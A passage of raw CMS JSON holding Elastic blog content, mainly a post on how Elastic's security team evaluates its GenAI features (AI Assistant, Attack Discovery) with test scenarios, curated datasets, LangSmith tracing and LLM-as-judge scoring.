href=\"https://www.elastic.co/elasticsearch/serverless\"\u003e\u003cspan style='font-size: 12pt;'\u003eLearn more\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e about the possibilities of serverless or start your \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/serverless-registration\"\u003e\u003cspan style='font-size: 12pt;'\u003efree trial now\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e on Azure in technical preview.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs32cc9d79f383ad21"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs87cfb40e0240d8de"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csb9d44b0601af6280"}}}],"publish_date":"2025-02-06","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Announcing the technical preview of Elastic Cloud Serverless on Azure","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Elastic Cloud Serverless provides the fastest way to start and scale security, observability, and search solutions — without managing infrastructure.","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[{"uid":"bltada2311dae66943e","_content_type_uid":"tags_partner"}],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt38a6c014d6bd5ecb","ACL":{},"created_at":"2021-06-02T15:27:49.854Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack","label_l10n":"Stack","tags":[],"title":"Stack","updated_at":"2021-07-13T22:00:22.378Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.258Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blte5366a60bd5ae8af","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2025-02-06T01:25:19.754Z","created_by":"bltb6c155cd84fc0c1a","file_size":"33874","filename":"blog-serverless-azure-tech-preview_1-blog_header.jpg","parent_uid":null,"tags":[],"title":"blog-serverless-azure-tech-preview_1-blog header.jpg","updated_at":"2025-02-06T01:25:19.754Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2025-02-06T10:55:01.030Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte5366a60bd5ae8af/67a40f7fc0a3735f7f40ada6/blog-serverless-azure-tech-preview_1-blog_header.jpg"},"title":"Elastic Cloud Serverless now available in technical preview on Microsoft Azure","title_l10n":"Elastic Cloud Serverless now available in technical preview on Microsoft Azure","updated_at":"2025-02-06T01:32:30.015Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-cloud-serverless-microsoft-azure-tech-preview","publish_details":{"time":"2025-02-06T10:55:01.003Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt0947dcf4c9567504","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"See how Elastic Security builds and evaluates GenAI features such as AI Assistant and Attack Discovery, leveraging LLMs and tools like LangGraph for agents and LangSmith for tracing.","author":["blt142ea9eec72c5509","blt7c263b5710eeb974"],"category":["bltb79594af7c5b4199"],"created_at":"2025-02-03T16:04:08.825Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs39f48e22c36057dc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic has long been developing machine learning (ML) and AI-powered \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html#security-integrations-jobs\"\u003e\u003cspan style='font-size: 12pt;'\u003esecurity detections\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. We constantly bring in new technologies when available to help make our users’ lives easier. So, with the rise of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/generative-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003egenerative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e (GenAI), we have developed even more Elastic Security features to use this powerful, new technology. Among those are:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/security-assistant.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElastic AI Assistant for Security\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Our chatbot is built to answer questions about Elastic Security, help generate or translate natural language queries to ES|QL, provide context on alerts, and integrate with custom knowledge sources for bespoke organizational questions.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/attack-discovery.html\" target=\"_self\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAttack Discovery (AD)\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e This feature reviews alerts and discovers any active attacks, prioritizing and summarizing them for the user.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/automatic-import-ai-data-integration-builder\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAutomatic Import\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e This feature creates custom integrations based on a few sample log lines, alleviating the burden of creating parsing logic and normalization pipelines.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor those familiar with GenAI development, the area is rapidly growing. At Elastic, we are in a unique position in that we have real and proven GenAI-powered products that are serving users \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eat scale\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e — not just tinkering or as proof-of-concepts. This unique position is two-fold — we closely partner with \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eand\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e use leading GenAI development frameworks. In fact, we were named \u003c/span\u003e\u003ca href=\"https://blog.langchain.dev/top-5-langgraph-agents-in-production-2024\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003e#2 in the Top 5 LangGraph Agents in Production 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e by LangChain. We were also named \u003c/span\u003e\u003ca href=\"https://aws.amazon.com/blogs/apn/announcing-the-2024-geo-and-global-aws-partners-of-the-year\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eGenAI Infrastructure and Data Partner of the Year \u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003eby Amazon Web Services.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Driving GenAI development","_metadata":{"uid":"cs05b8b1408a2b3137"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic is also a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003ecreator \u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eof GenAI development tools, which not only enables our products but also those built by users of the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elastic-stack\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Stack\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. We are the world’s most \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/vector-database\"\u003e\u003cspan style='font-size: 12pt;'\u003ewidely downloaded vector database\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, supporting \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/retrieval-augmented-generation\"\u003e\u003cspan style='font-size: 12pt;'\u003eRAG\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e applications around the world. Due to this combination, we have a driver’s seat view of GenAI development, which we’re aiming to share more with those interested in building a production-grade GenAI system.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this blog, we’ll share the behind the scenes of how our Security GenAI team and Security ML team develop and improve these GenAI features. How are we quantitatively ensuring that each improvement is really \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003ebetter\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e? Given that we are in production and serving enterprise users at scale, we needed a robust and reproducible way of prompt tuning and evaluating various large language model (LLM) providers.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Constant improvements: Making security analysts’ lives easier","_metadata":{"uid":"cs27bed8c7269975bd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSince the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/introducing-elastic-ai-assistant\"\u003e\u003cspan style='font-size: 12pt;'\u003erelease\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e of Elastic AI Assistant in June 2023, delivering high-quality results to our users has been a top priority. Fast forward to 2025, we've not only rolled out numerous enhancements to the AI Assistant but also introduced groundbreaking features, such as Attack Discovery and Automatic Import. Throughout the development of these features and enhancements, we meticulously evaluated the quality of the outputs generated by various LLMs, continuously refining prompts and underlying code to meet our high standards.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic AI Assistant for Security","_metadata":{"uid":"cs65b2529f0831511c"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOne notable example is AI Assistant’s natural language-to-ES|QL generation functionality. To ensure AI Assistant returned valid ES|QL queries from natural language inputs, we started with a hands-on and largely manual approach. We created a spreadsheet filled with realistic queries that an analyst might use in a security operations center (SOC). Each query was manually put into the AI Assistant with responses recorded and compared to expected outputs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhile effective, this process was time-intensive. When \u003c/span\u003e\u003ca href=\"https://www.langchain.com/langsmith\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eLangSmith\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e became available, we quickly integrated it into our workflow, enabling us to trace and debug with greater efficiency. LangSmith’s evaluation capabilities also allowed us to build the first iteration of our internal evaluation framework. This framework supports automated evaluations based on a set of parameters, including a list of LLMs and input datasets. With these tools, we successfully transitioned from manual to automated evaluations, significantly improving our workflow.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Attack Discovery","_metadata":{"uid":"cs2cbfc1f857a8b21f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEvaluating Attack Discovery presented a more complex challenge for two key reasons.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAD’s input consists of sets of alerts representing one or more malicious attack scenarios. Creating realistic input alerts was essential to assess AD’s performance effectively.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDetermining the ideal output required expertise in cybersecurity. AD’s goal is to explain malicious attacks chronologically and in a narrative style that can be easily understood by security analysts of all levels. This need for expert judgment meant that early evaluations relied heavily on manual review from Elastic’s security experts, who also provided the engineering team with realistic alert sets for testing.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOver time, our evaluation process has evolved into a robust framework designed to ensure that our GenAI features deliver tangible value to our security customers. In the sections that follow, we’ll dive deeper into the latest state of this framework and explore how we use it to ensure the quality and reliability of our AI-powered solutions.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs13736be6e40ddc19"}}},{"image":{"image":{"uid":"blt3f6a65ac4d2b5fc7","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T15:55:17.178Z","updated_at":"2025-02-03T15:55:17.178Z","content_type":"image/png","file_size":"521389","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.857Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3f6a65ac4d2b5fc7/67a0e6e504d53f473041abbd/image2.png"},"_metadata":{"uid":"cs46af7a47a9f2e75d"},"caption_l10n":"Early version of our evaluation framework UI in 8.11","alt_text_l10n":"Early version of our evaluation framework UI in 8.11","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"GenAI evaluation framework: Knowing — not guessing — that each improvement is better","_metadata":{"uid":"csdb838c6011e38a5f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs mentioned in the previous section, we started using LangSmith and \u003c/span\u003e\u003ca href=\"https://www.langchain.com/langgraph\"\u003e\u003cspan style='font-size: 12pt;'\u003eLangGraph\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e together, enabling us to capture traces of each LLM call. On top of that, we developed a tailored evaluation framework, which became an essential tool in our development process. As we developed more improvements, there was more to consider. For example, which LLM model should we pick? We have a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/serverless/current/security-llm-performance-matrix.html\"\u003e\u003cspan style='font-size: 12pt;'\u003erecommended LLM matrix\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e as an outcome of those tests. And which prompts and variations perform the best?\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere are the components of the evaluation framework (which we will walk through in detail in following sections):\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eTest scenarios:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Diverse scenarios that the user may come across and each with its own gold standard examples\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCurated test dataset:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e An accumulation of gold standard examples covering various test scenarios\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eTracing:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Capturing the AI Agent execution graph as well as LLM calls and run metadata\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEvaluation rubrics:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Various behavior rubrics; for example, does this response seem like a hallucination? Does this response capture all the known user IDs in the query?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eScoring mechanism:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e A mathematical way to calculate final scores based on business requirements or desired heuristics\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFirst, we’ll go through the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003etest scenarios\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ecurated test dataset\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, as well as how we easily created and tracked them with LangSmith.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Test scenarios and curated test datasets","_metadata":{"uid":"csa61607f593a395a8"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSince Attack Discovery helps Elastic Security users find attacks from alerts, we needed to consider various attack types. We initially validated across datasets from detonated malware samples hosted and shared on Elastician James Spiteri’s \u003c/span\u003e\u003ca href=\"http://ohmymalware.com\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eohmymalware.com\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e project, but have since come up with many new attack \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003escenarios\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, covering for example, living-off-the-cloud attack, various advanced persistent threats, and well-known vulnerabilities like the Log4j vulnerability (2021). Credit also goes to the incredible \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e team — one of such evaluation scenarios came from work presented at \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-aws-reinvent-2024\"\u003e\u003cspan style='font-size: 12pt;'\u003eAWS re:Invent 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor each \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003escenario\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, we created a few expected responses. For some use cases, this might involve human-written outputs to compare with GenAI responses. But for our use case, we were able to run the scenarios through any LLM with a human-in-the-loop to decide if the result was good enough based on our criteria. For example, was the output clear to read from a user standpoint? And was the LLM summary accurate enough?\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa7a6943c14da561b"}}},{"image":{"image":{"uid":"blt3f591f3f5a357f33","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T15:57:00.024Z","updated_at":"2025-02-03T15:57:00.024Z","content_type":"image/png","file_size":"451358","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.815Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3f591f3f5a357f33/67a0e74ce729226e57538386/image1.png"},"_metadata":{"uid":"cs4e795a294d4d8c49"},"caption_l10n":"Example of an expected response on Attack Discovery based on Episode 4 of ohmymalware.com","alt_text_l10n":"Example of an expected response on Attack Discovery based on Episode 4 of ohmymalware.com","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cseaf8bf92d1bd7441"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf the output is qualitatively good enough, we add it to our \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003ecurated test dataset.\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Since we are using LangGraph and \u003c/span\u003e\u003ca href=\"https://blog.langchain.dev/langchain-partners-with-elastic-to-launch-the-elastic-ai-assistant/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eLangSmith\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, adding an example to a dataset is further simplified as the LangSmith UI has ways to add an existing output to a dataset.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdd2a7c62cdf81776"}}},{"image":{"image":{"uid":"blta47ad6c26dd7906f","_version":1,"title":"image9.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T15:57:26.770Z","updated_at":"2025-02-03T15:57:26.770Z","content_type":"image/png","file_size":"366147","filename":"image9.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.919Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta47ad6c26dd7906f/67a0e766956a022356ba41dc/image9.png"},"_metadata":{"uid":"cs3ce366deacca269a"},"caption_l10n":"Easily add an output in a trace to a dataset","alt_text_l10n":"Easily add an output in a trace to a dataset","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc423942bdc57b25c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt is important to have the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003escenarios\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003etest datasets\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in order to have a baseline of “goodness” of GenAI outputs. But we didn’t immediately get to this point; the initial effort of creating scenarios can be time-consuming, and since LLM outputs can have a high variance, some of the selection of curated examples can be difficult.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHowever, this was a well-invested effort on an ongoing basis in order to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eknow\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e if our improvements are actually making the product better. This also enabled us to run automated LLM evaluations (“\u003c/span\u003e\u003ca href=\"https://docs.smith.langchain.com/evaluation/concepts\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eLLM-as-judge\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e”) and experiment whenever we deploy a new change. The prompts used for LLM-as-judge can also be tuned. For simplicity, we will refer to both the prompts used to generate outputs as well as the “judge” outputs as \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eprompts\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in this article.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0f668d6ea01f2464"}}},{"image":{"image":{"uid":"blt7dd4e02083c453b0","_version":1,"title":"image4.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T15:58:05.468Z","updated_at":"2025-02-03T15:58:05.468Z","content_type":"image/png","file_size":"174580","filename":"image4.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.938Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7dd4e02083c453b0/67a0e78d60be650253c996be/image4.png"},"_metadata":{"uid":"cs5f9f024eaf7c852c"},"caption_l10n":"Creating a curated test dataset","alt_text_l10n":"Creating a curated test dataset","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Tracing","_metadata":{"uid":"cs84e8fe4a18abf767"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNext, we’ll touch on the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003etracing\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e components. As mentioned above, we use LangGraph to design and run our AI Agent workflows behind the scenes, while LangSmith provides the tracing capabilities as well as streamlined tools for us to create test datasets and run evaluations.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor completeness, the following image illustrates the high-level workflow of how the Elastic Security AI Agents work — from when it gets a user request to when it generates the response. We use Elasticsearch as a vector database to power retrieval augmented generation (RAG) functionality.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs341a4a46cf9be980"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cscd8a54f9fd753f31"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNote: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eFor users to enable AI Assistant and Attack Discovery, an LLM connector is required. We support all major providers — see our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/llm-connector-guides.html\"\u003e\u003cspan style='font-size: 12pt;'\u003edocumentation page\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for an up-to-date list.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information 